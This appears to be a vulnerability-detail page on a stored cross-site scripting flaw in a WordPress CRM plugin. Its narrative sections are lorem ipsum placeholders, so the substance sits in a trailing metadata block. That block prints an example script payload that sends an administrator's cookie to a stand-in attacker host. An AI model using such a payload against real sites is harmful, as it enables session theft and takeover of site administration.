Sceawere
Vulnerability Detail
CVE-2026-84261UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV
Stored XSS in click5 CRM
Vulnerability Metadata
- Severity
- High
- Score / CVSS
- 8.8
- Creation Date
- 8h ago
- Vendor
- Unknown
- Product
- click5 CRM add-on to Contact Form 7
- Attack Type
- CWE-79 Cross-Site Scripting (XSS)
- Vector String
- CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- Attack Complexity
- LOW
Narrative and Response
Description
The click5 CRM add-on to Contact Form 7 WordPress plugin through 1.0.4 does not sanitise and escape content submitted through an unauthenticated endpoint before outputting it back in an admin page, leading to Stored XSS which could be used against high privilege users such as admin.
Executive Summary
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Technical Details
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Mitigations
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
References
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
Additional Metadata
{
"score": "8.8",
"pubDate": "2026-10-11T07:17:25.590Z",
"pubdate": "2026-10-11T07:17:25.590Z",
"executiveSummary": "The click5 CRM add-on for the Contact Form 7 WordPress plugin, versions 1.0.4 and below, is susceptible to a Stored Cross-Site Scripting (XSS) vulnerability.\nThe vulnerability originates from the application's failure to properly sanitize and escape input received via an unauthenticated endpoint before rendering it within an administrative interface.\nAn unauthenticated remote attacker can exploit this flaw by injecting malicious JavaScript payloads into the CRM data fields.\nSuccessful exploitation allows the arbitrary execution of code within the security context of an administrator's browser session.\nThis impact includes the potential for session hijacking, unauthorized administrative actions, theft of sensitive CRM data, and persistent redirection or defacement of the affected WordPress dashboard.\nBecause the payload is stored and triggered when an administrator views the submission, the attack does not require the administrator to interact with a malicious link, making it a highly effective mechanism for privilege escalation within the WordPress backend.",
"technicalDetails": "The vulnerability exists within the input handling logic of the click5 CRM add-on, which processess data submitted through an unauthenticated endpoint associated with Contact Form 7 integration.\nThe root cause is a lack of input validation and output encoding when the plugin processes user-supplied data for display in the WordPress dashboard.\nSpecifically, the plugin accepts form submissions and persists them into the database without implementing appropriate sanitization functions, such as sanitize_text_field() or esc_html(), upon storage.\nFurthermore, when these entries are retrieved and rendered in the admin panel's viewing interface, the plugin fails to apply proper output escaping techniques.\nAn attacker can leverage this by crafting a POST request to the form endpoint, inserting an XSS payload (e.g., <script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script>) into one of the form fields.\nThe server processes this request and stores the malicious string in the database as part of the form entry.\nWhen an administrator logs into the WordPress backend and navigates to the click5 CRM plugin interface to review submissions, the application retrieves the stored data and injects it directly into the HTML DOM without sanitization.\nThe browser interprets the injected payload as trusted content, executing the attacker-supplied JavaScript.\nThis execution occurs under the privileges of the administrator, granting the attacker access to administrative session tokens, the ability to modify site settings, create new administrative users, or execute additional malicious plugins.\nThe attack vector is inherently dangerous as it bypasses the need for the administrator to be tricked into clicking a link, as the malicious payload is delivered automatically during routine administrative monitoring of form entries.\nThe affected component is the data processing layer responsible for rendering form submissions within the administrative dashboard of the click5 CRM add-on."
}